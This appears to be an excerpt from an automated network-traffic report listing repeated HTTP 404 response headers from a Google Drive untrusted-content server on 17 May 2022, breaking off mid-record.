                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:37 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-dg6Z4/e0xCdz5jpqqks6/Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:37 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-YNOztSjxgTqRFYxTgav19g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:37 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-66vq8RjDRDhJyj99j1r1XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:37 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-F8aVh+OR4H5zXMvLyPVp4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:37 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LsM8Zc4knC9o+ASidVhJSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:37 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-bhEdxzghj8LPeRZx+HTKGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:38 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-KEvO0sDQtPujguOcDt7xRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:38 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pYIKedYtfW5XgaOa3o760w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:38 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LhV82v7KtqAWQlrEO0I0Sg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:38 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-M5YBli995wMwLbL62tFTaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:38 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-GweK7n/Y29h3e5oAWsYN4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:38 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-TiFM2Vs2RShj4U+Fatfezg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:38 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-81P8juAhq8O5vDMK4PEdVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:38 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9XDbunjwpty1Fw1nmUokRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:39 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-olL2wAzIjiC+pyTWE0AvFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:39 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SKWpioILuzPno1V5A8g9jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:39 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-C0okGZWD+IKfaeCsOR9TUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:39 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-cv/4ppURP8Kv7jzOjA5noA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:39 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-J7N4rmT02FRrx9SAFpdKHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:39 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: script-src 'report-sample' 'nonce-hx/ox6gE1KqCmyT7IVY0sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; 